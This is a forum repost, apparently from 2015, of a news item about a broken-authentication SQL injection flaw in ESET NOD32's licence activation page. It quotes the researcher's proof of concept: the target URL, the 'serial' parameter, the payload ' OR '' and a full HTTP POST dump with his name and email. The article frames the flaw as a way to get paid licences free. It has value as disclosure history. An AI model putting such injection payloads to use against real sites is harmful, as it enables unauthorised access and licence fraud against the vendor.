Vulnerability in ESET NOD32 Licence Activation generates unlimited usernames and pass

[MrGrj]

Security Researcher discovers Vulnerability in ESET Nod32 Antivirus License authentication system which generates free license (username and password)

With so many worms and trojans out in the open, every computer user would like to have an Antivirus on board his/her PC but it would be really nice to have a paid version of an Antivirus for free. No this is not a giveaway but a researcher has discovered a serious vulnerability in the ESET Nod32 licensed version which allows hackers to use it for a full year without paying.

Security researcher, Mohamed Abdelbaset Elnoby has discovered a vulnerability in ESET Nod32 licensed version authentication that allows potential hackers generate millions of usernames and passwords without a hitch.

Elnoby has dubbed the authentication bug as “hilarious” and he states that, “Hilarious Broken Authentication bug I found in ESET website specifically in their “Antivirus Product Activation Process” that allowed me to generate millions of valid paid Licenses of “ESET Nod32 Antivirus” as per their description “Our award-winning security software offers the most effective protection available today” for free. ”

The exploit of generating unlimited usernames and passwords for ESET Nod32 is caused due to broken authentication bug. While most applications require authentication to gain access to private information or to execute tasks, not every authentication method is able to provide adequate security. Negligence, ignorance, or simple understatement of security threats often result in authentication schemes that can be bypassed by simply skipping the login page and directly calling an internal page that is supposed to be accessed only after authentication has been performed. Elnoby discovered that there are several ways of bypassing the ESET Nod32 authentication like :

• Direct page request (forced browsing)
  
• Parameter modification
  
• Session ID prediction
  
• SQL injection
  

The PoC of the bug is given below :

[*] Vulnerability Type : A2 – Broken Authentication and Session Management

[*] URL / Service: http://eu-eset.com/me/activate/reg/

[*] Vulnerable Parameter(s) / Input(s): “serial” (Product Key field)

[*] Payload / Bypass string: ‘ OR ”’

[*] Request full dump:

POST /me/activate/reg/ HTTP/1.1

Host: eu-eset.com

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: Activate ESET Software

Cookie: [*]

Connection: keep-alive

Content-Type: multipart/form-data; boundary=---------------------------25242107630722

Content-Length: 885

-----------------------------25242107630722

Content-Disposition: form-data; name="serial"

' OR '''

-----------------------------25242107630722

Content-Disposition: form-data; name="country"

20

-----------------------------25242107630722

Content-Disposition: form-data; name="firstname"

Mohamed

-----------------------------25242107630722

Content-Disposition: form-data; name="lastname"

Abdelbaset

-----------------------------25242107630722

Content-Disposition: form-data; name="company"

Seekurity

-----------------------------25242107630722

Content-Disposition: form-data; name="email"

SymbianSyMoh@Outlook.com

-----------------------------25242107630722

Content-Disposition: form-data; name="phone"

12345678911

-----------------------------25242107630722

Content-Disposition: form-data; name="note"

-----------------------------25242107630722--

Sursa surselor

Edited May 17, 2015 by MrGrj

[cyadron]

Foarte tare, din pacate a fost reparat.